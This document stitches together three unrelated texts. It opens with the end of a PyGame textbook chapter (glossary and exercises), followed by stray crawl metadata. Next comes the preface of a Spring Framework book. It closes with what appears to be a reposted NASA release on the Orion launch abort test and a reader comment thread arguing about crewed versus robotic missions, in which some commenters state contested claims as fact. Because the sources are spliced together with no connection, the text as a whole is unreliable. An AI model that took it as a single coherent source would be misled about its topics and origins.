- There are random timings that add to the fun — when to spawn the next Alien, when an Alien drops the next bomb, etc.
- The game plays sounds too: a less-than-relaxing loop sound, plus sounds for the shots and explosions.
17.8. Reflections¶
Object oriented programming is a good organizational tool for software. In the examples in this chapter, we’ve started to use (and hopefully appreciate) these benefits. Here we had N queens each with its own state, falling to its own floor level, bouncing, getting kicked, etc. We might have managed without the organizational power of objects — perhaps we could have kept lists of velocities for each queen, and lists of target positions, and so on — our code would likely have been much more complicated, ugly, and a lot poorer!
17.9. Glossary¶
- animation rate
- The rate at which we play back successive patches to create the illusion of movement. In the sample we considered in this chapter, we played Duke’s 10 patches over the duration of one second. Not the same as the frame rate.
- baked animation
- An animation that is designed to look good at a predetermined fixed frame rate. This reduces the amount of computation that needs to be done when the game is running. High-end commercial games usually bake their animations.
- blit
- A verb used in computer graphics, meaning to make a fast copy of an image or pixels from a sub-rectangle of one image or surface to another surface or image.
- frame rate
- The rate at which the game loop executes and updates the display.
- game loop
- A loop that drives the logic of a game. It will usually poll for events, then update each of the objects in the game, then get everything drawn, and then put the newly drawn frame on display.
- pixel
- A single picture element, or dot, from which images are made.
- poll
- To ask whether something like a keypress or mouse movement has happened. Game loops usually poll to discover what events have occurred. This is different from event-driven programs like the ones seen in the chapter titled “Events”. In those cases, the button click or keypress event triggers the call of a handler function in your program, but this happens behind your back.
- sprite
- An active agent or element in a game, with its own state, position and behaviour.
- surface
- This is PyGame’s term for what the Turtle module calls a canvas. A surface is a rectangle of pixels used for displaying shapes and images.
17.10. Exercises¶
- Have fun with Python, and with PyGame.
- We deliberately left a bug in the code for animating Duke. If you click on one of the chessboard squares to the right of Duke, he waves anyway. Why? Find a one-line fix for the bug.
- Use your preferred search engine to search their image library for “sprite sheet playing cards”. Create a list [0..51] to represent an encoding of the 52 cards in a deck. Shuffle the cards, slice off the top five as your hand in a poker deal. Display the hand you have been dealt.
- So the Aliens game is in outer space, without gravity. Shots fly away forever, and bombs don’t speed up when they fall. Add some gravity to the game. Decide if you’re going to allow your own shots to fall back on your head and kill you.
- Those pesky Aliens seem to pass right through each other! Change the game so that they collide, and destroy each other in a mighty explosion. | http://7-fountains.com/7FD/thinkcspy3/thinkcspy3/pygame.html | CC-MAIN-2018-51 | refinedweb | 5,695 | 76.15 |
Safari Books Online is a digital library providing on-demand subscription access to thousands of learning resources.
The Spring Framework was created with a very specific goal in mind—to make developing JEE applications easier. Along the same lines, Spring in Action was written to make learning how to use Spring easier. My goal is not to give you a blow-by-blow listing of Spring APIs. Instead, I hope to present the Spring Framework in a way that is most relevant to a JEE. That way, the book can act as a tool for learning Spring for the first time as well as a guide and reference for those wanting to dig deeper into specific features.
Spring in Action Second Edition is divided into three parts, plus two appendices. Each of the three parts focuses on a general area of the Spring Framework: the core framework, the business and data layers, and the presentation layer. While each part builds on the previous section, each is also able to stand on its own, allowing you to dive right into a certain topic without starting from the beginning.
In part 1, you’ll explore the two core features of the Spring framework: dependency injection (DI) and aspect-oriented programming (AOP). This will give you a good understanding of Spring’s fundamentals that will be utilized throughout the book.
In chapter 1, you’ll be introduced to DI and AOP and how they lend themselves to developing loosely coupled Java applications.
Chapter 2 takes a more detailed look at how to configure and associate your application objects using dependency injection. You will learn how to write loosely coupled components and wire their dependencies and properties within the Spring container using XML.
Once you’ve got the basics of bean wiring down, you’ll be ready to look at some of the more advanced features of the Spring container in chapter 3. Among other things, you’ll learn how to hook into the lifecycle of your application components, create parent/child relationships among your bean configurations, and wire in scripted components written in Ruby and Groovy.
Chapter 4 explores how to use Spring’s AOP to decouple cross-cutting concerns from the objects that they service. This chapter also sets the stage for later chapters, where you’ll use Spring AOP to provide declarative services such as transactions, security, and caching.
Part 2 builds on the DI and AOP features introduced in part 1 and shows you how to apply these concepts in the data and business tiers of your application.
Chapter 5 covers Spring’s support for data persistence. You’ll be introduced to Spring’s JDBC support, which helps you remove much of the boilerplate code associated with JDBC. You’ll also see how Spring integrates with several popular persistence frameworks such as Hibernate, iBATIS, and the Java Persistence API (JPA).
Chapter 6 complements chapter 5, showing you how to ensure integrity in your database using Spring’s transaction support. You will see how Spring uses AOP to give simple application objects the power of declarative transactions.
In chapter 7 you will learn how to apply security to your application using Spring Security. You’ll see how Spring Security secures application both at the web request level using servlet filters and at the method level using Spring AOP.
Chapter 8 explores how to expose your application objects as remote services. You’ll also learn how to seamlessly access remote services as though they were any other object in your application. Remoting technologies explored will include RMI, Hessian/Burlap, SOAP-based web services, and Spring’s own HttpInvoker.
Although chapter 8 covers web services in Spring, chapter 9 takes a different look at web services by examining the Spring-WS project. In this chapter, you’ll learn how to use Spring-WS to build contract-first web services, in which the service’s contract is decoupled from its implementation.
Chapter 10 looks at using Spring to send and receive asynchronous messages with JMS. In addition to basic JMS operations with Spring, you’ll also learn how to using the open source Lingo project to expose and consume asynchronous remote services over JMS.
Even though Spring eliminates much of the need for EJBs, you may have a need to use both Spring and EJB together. Therefore, chapter 11 explores how to integrate Spring with EJB. You’ll learn how to write Spring-enabled EJBs, how to wire EJB references into your Spring application context, and even how to use EJB-like annotations to configure your Spring beans.
Wrapping up part 2, chapter 12 will show you how to use Spring to schedule jobs, send e-mails, access JNDI-configured resources, and manage your application objects with JMX.
Part 3 moves the discussion of Spring a little closer to the end user by looking at the ways to use Spring to build web applications.
Chapter 13 introduces you to Spring’s own MVC web framework. You will discover how Spring can transparently bind web parameters to your business objects and provide validation and error handling at the same time. You will also see how easy it is to add functionality to your web applications using Spring’s rich selection of controllers.
Picking up where chapter 13 leaves off, chapter 14 covers the view layer of Spring MVC. In this chapter, you’ll learn how to map the output of a Spring MVC controller to a specific view component for rendering to the user. You’ll see how to define application views using JSP, Velocity, FreeMarker, and Tiles. And you’ll learn how to create non-HTML output such as PDF, Excel, and RSS from Spring MVC.
Chapter 15 explores Spring Web Flow, an extension to Spring MVC that enables development of conversational web applications. In this chapter you’ll learn how to build web applications that guide the user through a specific flow.
Finally, chapter 16 shows you how to integrate Spring with other web frameworks. If you already have an investment in another web framework (or just have a preference), this chapter is for you. You’ll see how Spring provides support for several of the most popular web frameworks, including Struts, WebWork, Tapestry, and JavaServer Faces (JSF).
Appendix A will get you started with Spring, showing you how to download Spring and configure Spring in either Ant or Maven 2.
One of the key benefits of loose coupling is that it makes it easier to unit-test your application objects. Appendix B shows you how to take advantage of dependency injection and some of Spring’s test-oriented classes for testing your applications.
As I was writing this book, I wanted to cover as much of Spring as possible. I got a little carried away and ended up writing more than could fit into the printed book. Just like with many Hollywood movies, a lot of material ended up on the cutting room floor:
“Building portlet applications” This chapter covers the Spring Portlet MVC framework. Spring Portlet MVC is remarkably similar to Spring MVC (it even reuses some of Spring MVC’s classes), but is geared for the special circumstances presented by portlet applications.
Appendix C, “Spring XML configuration reference” This appendix documents all of the XML configuration elements available in Spring 2.0. In addition, it includes the configuration elements for Spring Web Flow and Direct Web Remoting (DWR).
Appendix D, “Spring JSP tag library reference” This appendix documents all of the JSP tags, both the original Spring JSP tags and the new form-binding tags from Spring 2.0.
Appendix E, “Spring Web Flow definition reference” This appendix catalogs all of the XML elements that are used to define a flow for Spring Web Flow.
Appendix F, “Customizing Spring configuration” This appendix, which was originally part of chapter 3, shows you how to create custom Spring XML configuration namespaces.
There’s some good stuff in there and I didn’t want that work to be for naught. So I convinced Manning to give it all of the same attention that it would get if it were to be printed and to make it available to download for free. You’ll be able to download this bonus material online at.
Spring in Action Second Edition is for all Java developers, but enterprise Java developers will find it particularly useful. While I will guide you along gently through code examples that build in complexity throughout each chapter, the true power of Spring lies in its ability to make enterprise applications easier to develop. Therefore, enterprise developers will most fully appreciate the examples presented in this book.
Because a vast portion of Spring is devoted to providing enterprise services, many parallels can be drawn between Spring and EJB. Therefore, any experience you have will be useful in making comparisons between these two frameworks.
Finally, while this book is not exclusively focused on web applications, a good portion of it is dedicated to this topic. In fact, the final four chapters demonstrate how Spring can support the development your applications’ web layer. If you are a web application developer, you will find the last part of this book especially valuable.
There are many code example throughout this book. These examples will always appear in a fixed-width code font. If there is a part of example we want you to pay extra attention to, it will appear in a bolded code font. Any class name, method name, or XML fragment within the normal text of the book will appear in code font as well.
Many of Spring’s classes and packages have exceptionally long (but expressive) names. Because of this, line-continuation markers (
) may be included when necessary.
Not all code examples in this book will be complete. Often we only show a method or two from a class to focus on a particular topic.
Complete source code for the application found throughout the book can be downloaded from the publisher’s website at or.
Craig Walls is a software developer with more than 13 years’ experience and is the coauthor of XDoclet in Action (Manning, 2003). He’s a zealous promoter of the Spring Framework, speaking frequently at local user groups and conferences and writing about Spring on his blog. When he’s not slinging code, Craig spends as much time as he can with his wife, two daughters, six birds, four dogs, two cats, and an ever-fluctuating number of tropical fish. Craig lives in Denton, Texas.
Purchase of Spring in Action includes free access to a private web forum run by Manning Publications where you can make comments about the book, ask technical questions, and receive help from the authors and from other users. To access the forum and subscribe to it, point your web browser to the author some challenging questions, lest his interest stray!
The Author Online forum and the archives of previous discussions will be accessible from the publisher’s website as long as the book is in print. | http://my.safaribooksonline.com/book/programming/java/9781933988139/about-this-book/pref05 | CC-MAIN-2014-15 | refinedweb | 1,841 | 59.64 |
The world's most viewed site on global warming and climate change
From NASA
July 2, 2019
RELEASE 19-054
/>
Ascent Abort-2 successfully launched at 7 a.m. EDT from Space Launch Complex 46 at Cape Canaveral Air Force Station in Florida
Credits: NASA:
For more information about NASA’s Moon to Mars exploration plans, visit:
-end-
Yes…I managed to get as far as my garden gate today….this has brought my trip to Antarctica that much closer!
One wonders what would have happened if NASA had carried on with lunar activities instead of ending the Apollo program. There was no real goal other than reaching the moon. 40 years of potential advance lost. Maybe they just didn’t have the technology. Landing a person on the moon may have happened 20 years too soon.
I can tell you what would have happened. Sooner rather than later a terrible accident would have happened claiming the lives of the astronauts involved. Since there was no clear goal, that would have put a long moratorium to space missions, similar to what happened to the space shuttle. Apollo 13 was already a close call. And after all, we still haven’t found anything outside that makes it worth for us to go personally.
Javier, it is imperative that we quickly disabuse the general public of the concept that spaceflight is safe, or that ANY exploration that humans have ever attempted was safe. “Safe” being a relative term. You’ll discover very little about the outside world from your couch, although you may be entertained by the discoveries of others.
A quick history survey will attest to this. Magellan never circumnavigated the globe. He died in transit. What risk is too great for exploration? For many, certainly not death.
As of 2018, there have been 18 astronaut and cosmonaut fatalities during spaceflight. Apollo only claimed 3 (and they weren’t even flying). We lost 7 with Challenger, and 7 more with Columbia.
There are numerous other fatalities that occurred during training (altitude chamber mishap, etc.)
As to your personal reasons for not exploring, is because we haven’t found anything yet? Isn’t that the purpose of exploring to find out what you don’t know?”
One word: Robotics
We didn’t have that in the 1960’s. We’ve had rovers soft-land Mars and running around on the surface for over 15 years now.
The Mars 2020 rover, which arrives at Mars in 2021, will collect rock and soil samples and store them for future return to Earth. But thus far, no plan has solidified on how, or even if, those samples will be returned.
But a Mars robotic sample return (MSR) mission engineering and planning is already well underway.
Adding a 3 or 4 humans to an 800 day interplanetary mission to Mars to get a few dozen kilos of Mars dirt and rocks is just a colossal, stupid waste of resources.
Robotics has its uses and history as well. We sent several robotic probes to the moon before we sent any men.
However, I will disagree on the capabilities of robot surveyors. A well trained geologist will outperform any current robot. A geologist will not spend 3 weeks observing a rock that he can quickly discern has less interest than the boulder sitting 3 feet away.
The best robots we have today are still less intelligent than your average scientist.
There is a further tacit reason why we conduct manned space missions and why we even attempt to analyze the data robots can collect. Because the purpose is to allow humans to fly through space to get to these places we’ve explored. If all we want to do is watch travelogues for robots we have SciFi for that.
The orion system looks like an essential space faring capability able to envisage manned trips beyond low earth orbit. While I agree that space exploration is an excellent application for robots, I admire the USA for developing this manned capability.
I didn’t say we shouldn’t explore, but what is the rationale to send people? They take up lots of space and weight, requiring lots of life support systems with built in redundancy and in exchange they produce excrements. They make everything a lot more expensive and complicated.
Let’s just develop better AIs that can respond in real time. Humans are not fit for the purpose of space exploration. Robots are far superior.
I total agree send robots. And do not be cheer leader for silly wastes of money.
Why go to Mars? No atmosphere. No water. Deadly radiation. What is the prize that is worth trying to solve problems which are impossible to solve with current physics/science.
A Mars colony is impossible as Mars does not have a magnetic field to protect it from cosmic and solar radiation.
Reducing the transit time to Mars, from roughly 3 years including the 500-day forced wait on Mars, requires an advanced propulsion system.
But again, why bother? What is the prize to go to Mars.
As there is no physically realistic solution to the radiation problem without a real breakthrough spending money on manned space flight is a waste of money and killing animals with radiation to find out how the Mars astronauts might die or get sick (diarrhea is a problem as the bacteria in the gut are killed by the constant radiation.) is …
Except from Scientific American article:
The perils of cosmic rays pose severe, perhaps insurmountable, hurdles to human spaceflight to Mars and beyond
By Eugene N. Parker
In a report published last August, they estimated that Mars astronauts would receive a dose of more than 80 rems a year.
By comparison, the legal dose limit for nuclear power plant workers in the U.S. is five rems a year. One in 10 male astronauts would eventually die from cancer, and one in six women (because of their greater vulnerability to breast cancer). What is more, the heavy nuclei could cause cataracts and brain damage. (To be sure, these numbers are highly uncertain.)
The galaxy is pervaded with fast-moving particles that can rip apart DNA and other molecules. Here at the surface of Earth, we are well protected from this cosmic radiation by the air mass overhead.
Astronauts in near equatorial orbits are shielded by the planet’s magnetic field.
But those who make long voyages away from Earth will suffer serious health consequences.
■.
A friend and colleague of mine, Rand Simberg, wrote an excellent book on the subject of space safety entitled Safe is Not an Option. His argument is, in essence, that the reason that safety is the first priority in NASA-style human space travel is that human space travel isn’t important. It was in the Apollo days (to show our superiority over the Soviets), but government-backed human space travel is no longer important.
Private space travel is important, and will continue to become more so. But the government need not fund it.
All too often one focuses on the objective and misses the true advancements and unspoken goals. The main purpose of the missions, “the goal”, was to learn what it takes to accomplish these tasks and to see if we could actually accomplish the feat. If one blinkers their vision to assume the only goal of attending university is to receive a diploma that misses the entire learning process, and the journey itself.
During the Apollo program so much unknown technology had to be invented from nothing to achieve even fabrication materials. We had, and still have, very limited knowledge of our moon.
How might have history unwound if we had discovered extremely valuable minerals on the moon? Well we did, it’s just that their value is only now becoming profitable to consider extracting.
The fact that individuals like Bezos and Musk are creating viable space ventures is only possible due to what has been already accomplished. Not just talked about, but actually accomplished.
“If I have seen further it is by standing on the shoulders of Giants.” Isaac Newton
I remember requests by entrepreneurs during the late 1990’s or so, to take possession of the large fuel tanks left in orbit by the space shuttle.
Some people apparently wanted to convert those tanks into hotels, for low-orbit vacations. NASA said no.
Here’s a BBC story on the idea:
I always regretted NASA’s lack of interest in, or cooperation with, that venture. It seemed a great opportunity and means to move into space.
The problem is that the large External Tank (ETs, the big orange foam colored cylinder) does not reach Low Earth Orbit (LEO) and falls into the Atlantic ocean. It would require significant additional propellant, propulsive and guidance systems to park the ETs into stable LEO. Then there is the on orbit accessibility issue. The have no docking mechanism, no grappling fixtures…the list goes on.
And…if you want to change orbits that’s another thing completely. It far less expensive to build an new rocket and launch it where you want it than significantly alter the orbital inclination of an existing object.
Its a nice sentiment until you actually consider the rocket engineering that would be necessary to provide this extra functionality. By the time you are finished it will not be the same vehicle.
I think most of the shuttle external fuel tanks went into the Indian Ocean, jettisoned over Africa.
You are correct I was thinking of the SRBs.
Still, if the companies wanted a try, I don’t see why NASA had to refuse letting them go ahead.
If they’d failed, no harm done except money spent (and maybe something learned). If they’d done something unexpected or innovative, so much the better.
But in any case, why not let them try?
Pat,
Who would be liable when (not if) a chunk of that orbited tank re-entered and landed on someone?
They were destructively disintegrated in the Indian Ocean with a sub-orbital prescribed re-entry footprint to prevent any chunk surviving from hitting a land mass to high certainty.
NASA lawyers think about those problems. They are very real. The hardware is theirs, from birth to fiery death, as long as it has a NASA logo on it anywhere.
Joel, I’d suppose that if some company bought the tank, they’d assume the liability.
One may also suppose they might have had some plan to raise the orbit a bit.
I’m assuming here the request was legitimate and serious. If so, the relevant company would have their own lawyers and their own engineers. One would hope for a realistic plan.
“I remember requests by entrepreneurs during the late 1990’s or so, to take possession of the large fuel tanks left in orbit by the space shuttle.
Some people apparently wanted to convert those tanks into hotels, for low-orbit vacations. NASA said no.”
NASA at one time had a space station design that utlized the large orange External Tank (153 ft long and 27.5 ft in diameter).
About 1994 NASA asked for space station designs and they settled on three designs: Option A, Option B, and Option C. Two of the space station designs, Options A and B, were designed around using the space shuttle to carry habitation modules in the shuttle cargo bay to be delivered to orbit, and would require dozens of space shuttle launches and a lot of time to get everything involved in orbit.
The Option C space station design was designed around using the Space Shuttle’s ET as the main body of the space station. This would be accomplished by adding a habitation module (15 ft in diameter by 15 ft long) to the bottom of the ET before launch. The habitation module would include everything the space station would need in orbit such as thrusters and life support.
The space shuttle could have launched this configuration all by itself although it would have had to fly with an empty cargo bay in order to make orbit. Once in orbit, the ET space station would be able to move around on its own,
The ET space station would require a couple of more shuttle lauches to finish the space station. The second flight would bring up the solar panels. The third flight miscellaneous supplies.
Option C was billions of dollars cheaper than Options A and B, was much less complicated, and could be put in orbit using only a few shuttle launches whereas Options A and B required dozens of shuttle launches and years of contruction in orbit.
Had NASA administrator Dan Goldin had any sense he would have picked Option C, but he wasn’t interested in the fastest, cheapest way to develop the Earth/Moon/Mars system, instead he was interested in maximizing the use of the space shuttle and Options A and B fit that program so that’s what they went with.
We could have used three or four shuttle launches to put a huge ET space station in orbit (One ET had more volume than the International space station) at a cost of less than $10 billion. We could do this again and put up in orbit an ET space station that we could put in orbit around the Moon, say at a cost of $15 billion (the extra costs are for the propellants needed to move the ET space station to the Moon; and then we build a third ET space station and put this one around Mars for maybe $30 billion. All of those projects are cheaper than the $100+ billion the International Space Station ended up costing
So Golden could have maximized using the space shuttle and could have developed the Earth/Moon/Mars system at the same time, but Goldin had no vision and he stuck us in low-Earth orbit for 20 years.
Then NASA throws away a perfectly good heavy-lift capability in the space shuttle launch system and spends more billions building a new heavy-lift vehicle that wouldn’t be any more capable than the space shuttle launch system. Spinning their wheels!
NASA bureaucrats are accomplished at wasting money. Lack of vision keeps us Earthbound and poorer.
I misstated the size of the habitat module on the Option C space station. It was to be 15 ft long and 27.5 ft in diameter, instead of 15 ft in diameter. I guess I was thinking about the diameter of space station modules carried inside the cargo bay (15 ft in diameter) when I wrote that.
Thanks for the detailed outline Tom. It seems very credible.
Here is a run-down of the option history. Option C had some problems, and apparently the various international partners didn’t like it because of the inconvenience of having to re-design their contributions.
It also seems option C suffered from a short design and test schedule. It would have benefited from a more deliberate developmental program.
I also seem to recall that Dan Goldin was opposed to the space shuttle at first, but came around when the space station was proposed. He said something like, the shuttle is “just the truck” to accomplish the mission.
Wouldn’t it have been special, though, to have had a space station as a chain of external fuel tanks and habitation modules.
It seems to me you’re right. Such a station could be put in orbit around the moon or Mars relatively cheaply, and be waiting there for people to arrive.
NASA are relying on the fact that the US public are so gullible about “saving lives” that if they send someone on a one-way journey to Mars, the public bombarded with daily sob stories from the “survivors” on Mars will cough up the eye-watering amounts that are needed to bring them back.
But I have no doubt that if you calculate the value of a life at perhaps $1million each, then it’s far better to risk a few daft astronauts than take the money out of government spending which saves lives (like protecting from Hurricanes).
It’s all about jobs for the boys at NASA.
Of course, it was the same idiotic Goebbels propaganda intent that is behind the global temperature data distortion by NASA … unless the public see a “problem” how will NASA get all the stupid US politicians to pay the eye-watering amounts to pop satellites into space to measure the global temperature (then tell us they don’t work when they don’t get the temperature rise they fiddled down on earth).
NASA is the biggest con trick … it’s only benefit to society has been an endless stream of self-publicising space clippings that have enabled almost every sci-fi fiction since NASA started. So, yes if you’re a star trek, star wars, 2001 space odyssey, etc. fan, it has had real benefits … but to actual science? Really? It’s clear to me the money wasted on NASA and their endless begging bowl to the US would have been far better spent elsewhere.
And I wouldn’t care what the US were wasting their money on, except the global warming scam is now set to cost us all in the UK around £30,000 (government estimate) or £200,000 (my more realistic figure) and so I’, sick to death with ALL the propaganda lies coming out of NASA.
If you are Scottish why do you care how the Americans spend their money
I’m with you, Mike. One should always spend all available resources on making our lives safer. People should not be allowed to rock climb, parachute, or fly for that matter. Risking money on an investment is stupid, because there is no guaranteed return, so take that money and invest it in safety. You can never invest too much money in safety, as people are so clever at 1) ignoring warnings, and 2) circumventing any safety measures devised.
Exploration is always silly. We should grow up and live out our lives in our parents’ house, because going outside is filled with risk. I myself and covered all the interior walls with bubble wrap to ensure that I am safe in the event of a fall. Not that I’m likely to fall – I remain firmly seated in front of my computer all day and night so as to minimize the dangers associated with moving around.
There is always the danger of someone getting irritated and coming after me for the snarky comments I leave on the internet. Maybe someone should take my computer away from me.
If you want to realize just how stupid people really are, just read the warning labels on things.
If it says:
Warning, do not take this internally…Some one did
Warning, not for consumption…Someone tried to eat it
Warning, do not use near water…Someone used it in the bathtub
Warning, not a flotation device…Someone drowned trying to float on it
For every warning message, there is a person that proved the need for it
Do your walls have buttons?
My walls had buttons…But I ate them all
I’m all for billionaires like Bezos or Musk spending their money on whatever legacy schemes to deep space they can dream up.
But I say, “Just keep your hands off my wallet to pay for that folly of manned Mars missions.”
You are correct in that much of the manned space flight activities of NASA is simply an expensive Jobs Program for engineers and scientists.
“The Orion test spacecraft traveled to an altitude of about six miles, at which point it experienced high-stress aerodynamic conditions expected during ascent.”
Isn’t that nice…
How does this protect rocket riders from internal fires and explosions?
I doubt the launch vehicle sticks around long enough to protect returning spaceship riders from re-entry hazards.
Which internal fires and explosions are you referring to?
The launch abort system is designed to safely extract the crew module, CM (where the astronauts sit) from any launch mishap. Mishaps are not only explosions, but also include trajectory failures (rockets flying wildly off course or tumbling). In such instances the launch vehicle will employ its launch destruct system (yes, they blow themselves up) to preclude the rocket from flying uncontrollably into populated areas (of course the launch abort system is fired first).
Think of launch abort system like an ejection system for a pilot of an aircraft, only this system ejects the entire cockpit (like the F-111) with the astronauts still strapped into their seats. It is designed to perform from 0/0 (zero speed and zero altitude) until no longer needed when, if not used, will jettison itself. The reason they did an inflight abort test was to assure the tractor rockets could safely distance the CM from a still fully firing launch vehicle. Static test firings have already proven its thrust, but the proof is in the pudding. There is far more to proving a system functionality than merely testing its components.
“’tis many a slip between cup and lip.”
The historical rocket accidents that actually killed America’s spacemen. Those are the fires and explosions to which I am referring.
Or are you claiming that NASA hid injuries and deaths from Americans?
Address the deadly effects first.
Address issues that send rockets off course or tumbling in the design and construction phases.
Address bad decisions by political animals by never allowing them to become managers in charge of people.
there was only one fire on the ground that killed people.There were no explosions inside the capsule.At the time the capsule was filled with 100% oxygen. Everything burns in pure oxygen. Now Nasa users a oxygen nitrogen atmosphere and fire proof materials. A internal fire now is not likely. There were no explosions inside the capsule.
I know they’ve tested the parachute system many times before but it seems a pity to waste an opportunity this time.
Alastair Brickell
My sources tell me, The parachute system was not ready so they pushed ahead with the test. Meeting milestones.
That is often the case in flight test. Specific test objectives and schedules take priority. Other “nice-to-have” systems will be deleted if they jeopardize primary objectives. I am not specifically familiar with the program schedule to know the level of system integration of the parachute system. But, the parachute system has previously been successfully tested.
These test articles are expensive and the test procedures are expensive. There is often significant program pressure to reduce unnecessary costs and inclusion of costly nice-to-haves often does not make the cut.
The future is truly unknowable. In the 1970s we all thought that cities in space and colonies on the Moon would happen in just a few decades, like the Space:1999 TV series from 1975 with Martin Landau showed.
Now is the turn of a new generation. Let’s see what the future holds. I now believe the future of mankind is linked to the rest of Earth’s species and there is little for us outside the Earth.
Our future is in the stars, Javier.
The meek shall inherit the Earth.
The brave shall inherit the stars.
Hienlien?
In about 6 billion years when the SUn swels to red-giant phase and envelopes the Earth, all the earth’s surface will be cooked off and sent into space.
Then we’ll be in Space. for sure.
Until then, and unless someone breaks Einstein’s GR and develops FTL ships, we’re committed to live and die on this beautiful blue water orb in a perfect goldilocks zone in a quiet galactic neighborhood.
We can (and have) send out intersellar gold- and platinum-plated plaques to say we were here, like Ozymandius crying out to his glory.
I recall reading about a fix for the sun going red giant by having Ceres orbit between Jupiter and Earth, thereby transmitting Jupiter’s orbital energy. Earth slowly moves to a larger orbit.
Apparently it would only take one Ceres pass every 6000 years or so to do the job.
Moving Ceres, of course, would take some effort. But still. 🙂
On the other topic, and having thought about it, it seems to me the collectivists will inherit Earth, and the individualists (the only free thinkers by principle) will head out to the stars.
My older brother was working for Varian when that plaque went out, Joel. Apparently the engineers at NASA Ames thought the male figure needed some appropriate embellishment (I’m being discrete here). So, they made and installed an alternate.
Unfortunately, the managers found it on a final inspection, and required the original to be replaced. More’s the pity. 🙂
Pat Frank
July 3, 2019 at 4:03 pm
I’m pretty sure it was the female figure that was the problem, not the male.
The designers of the Pioneer plaque originally had a small vertical line in the centre just below the hips of the female figure to provide more anatomical realism between the two figures but prudish NASA directors (or maybe their political masters) deleted it. Maybe they just wanted ET to know just how stupid the human race is/was.
My brother was pretty specific, Alastair. The improved male had an extension.
I’m not at all surprised by your story of the mannequinized female figure. Prudish managers projecting prudish space aliens.
I don’t buy it.
Two hundred years ago, Javier, people who thought like you would probably not have bought the idea that 500 people could be moved through the air at 39,000 feet and 550 mph.
Europe in 4 hr from Boston? Ha!
Technology always exceeds expectations.
Not a fan. The money being wasted on manned spaceflight beyond LEO, the cost – benefit just doesn’t work when we have robotics and AI now to explore the solar system and land on rocky surfaces in gravity wells.
I’d rather see the money spent instead on robotic missions and other actual science activities like replacements for STEREO A/B, a lander mission to Europa, and space-based telescopes.
Given realities, any money “saved” will go to global warming or Muslim outreach or other useless PC proposals. All you are doing in effect is giving the Luddites a rationale.
Joel , robotic probes have their place as the vanguard of space exploration. Since we’ve had them, robots have always been the precursors of human arrival. But, they are just that, preliminary testers. Their purpose is to determine if it is possible (or even desirable) and what is necessary for humans to survive in those locations. The purpose of robotic probes is not to populate a planet with robots.
We have one historical example of human space exploration of another surface. And the state of computer robotics of the 1960’s and early 1970’s was non-existent. The Viking landers were cool, but no one had to consider how to get off Mars once they go there.
The current manned concepts for Mars requires a 400 day stay on the surface before a 200 day cruise phase return can be completed. That’s 400 days of food, water, and oxygen for 3 or 4 adults. Waste recycling, water recycling, oxygen generation from water, and most importantly copious electricity for heating due to -70 F night time temps. The electricity can come from solar, but you better hope there are no big dust storms that can last for months, as RTG’s are heavy, expensive, and don’t provide much power when you consider the heating needs and water cycling-atmosphere needs for a human habitat.
Then the crew needs to be on the surface for the entire time so that Mars’ limited atmosphere can provide additional radiation shielding from solar energetic particles and GCRs.
Manned Mars missions would be such a colossal waste of resources. And they will teach us nothing about Mars that we won’t already know by 2030 with all the robotic missions underway and those planned. And we’ll likely just kill the astronauts anyway with slow radiation poisoning, so the return vehicle will bring back corpses.
Perhaps if Obama hadn’t diverted NASA toward Global Warming projects, and programs to help Muslims feel good about their historical science development, we would never have gotten out of the orbital vehicle business in the first place. Instead of having to bum a ride from the Russians to get too and from the ISS.
Survivable, but – boy – does that look like a rough ride.
Just as a point of information. NASA’s budget is a whopping $20 Billion of the $4 Trillion federal budget. That’s .5%.
Why is the government funding this project instead of funding SpaceX which is far ahead of the government project?
The government funds these so that any knowledge learned is in the public domain and not some companies proprietary secret.
I personally have had patent applications shelved because no proprietary rights could be claimed for the inventions.
Mercenaries can be fast and inexpensive, but they are in it for themselves.
Between NASA GIS , the Challenger disaster, and the Columbia disaster, what would make anybody think that NASA can be trusted with human life? The administration has time and time again shown that, in their minds, politics takes precedence over safety. And with the way AI and robotics are being developed, what exactly would be the reason humans lives would need to be risked in any mission?
Which means that either NASA gets a massive increase to pay for the manned phases when they start, or something elsewhere in the NASA budget gets a hit.
Personally I’d like to see GISS defunded entirely and their money split between JPL and GSFC programs. But GISS budget is just chump change compared to sending out a deep space probe mission.
Still it would be a return to some sanity for NASA.
In the 1960’s computers could be trusted to land on the Moon, gather samples, and return to Earth. Robotics and computers just weren’t advanced enough to pull that off. Today, that is definitely not the case, after soft-landing and running rovers all over Mars surface for 15 years now.
It’ll be hard to let go of “manned Mars”, but the likely lethal radiation hazards and the high cost do not justify the risks for the limited science return from a manned mission versus a robotic sample return mission.
The Moon and Mars manned stuff needs to be completely shelved, keep going to the ISS until it is time to de-orbit that platform. And then reassess/re-justify the need for even manned LEO missions post-ISS. Continue with robotic missions beyond LEO.
Adding the human component so dramatically raises costs and risk. Not worth it when so many other good missions need funding. We’ll likely learn nothing about the Moon or Mars we didn’t already know, and we are quite likely to lose people trying. The damage to national psyche would be tremendous.
The day a robotic mission finds an obelisk on the far-side of the Moon or on Ganymede, then we can think about sending a real human to make contact. But until then, I see no justification.
(g’errrrrata:)
In the 1960’s computers could **NOT** be trusted to land on the Moon…
Joel O’Bryan
July 3, 2019 at 12:27 pm
The Russians had unmanned sample return missions to the Moon in the early 1970’s.
“It’ll be hard to let go of “manned Mars”, but the likely lethal radiation hazards and the high cost do not justify the risks for the limited science return from a manned mission versus a robotic sample return mission.”
A one-meter-thick water ice envelope around habitation modules will solve the radiation problem in space.
Humans are going to Mars. It may not be by NASA people, but they are going. They think it is worth the risk and they have the money to pay for it.
I think there is no doubt that humans will be living and thriving in space within the next 50 years or sooner. Jeff Bezos, the multi-billionaire, is a student of Gerard O’Neill and he is going to put a human habitat in orbit as soon as he can.
Humans will have our own Dyson Sphere one of these days, imo.
On May 10th, 1869, the last spike was driven at Promontory Point UT, joining the Central Pacific and Union Pacific railways and creating the trans continental railroad spanning the United States of America. The steam powered locomotives and the electric telegraph that paralleled the rail route were technological leaps that forever changed transportation and communications as we know it. The western frontier was now easily accessible for commerce, direct communication, and human access.
Just one hundred years later, on July 16th 1969, Neil Armstrong, Buzz Aldrin and Michael Collins launched from Cape Canaveral on Apollo 11, riding atop the massive 3-stage Saturn V rocket and headed for a landing on the moon. At 4:17pm July 20, our nation received the radio message “The Eagle has landed!” The Lunar Lander, with Armstrong and Aldrin aboard, had safely landed on the moon. July 20th 1969, at 10:56pm, we watched Neil Armstrong on television as he stepped from the Lunar Lander onto lunar soil, declaring “That’s one small step for a man, one giant leap for Mankind.”
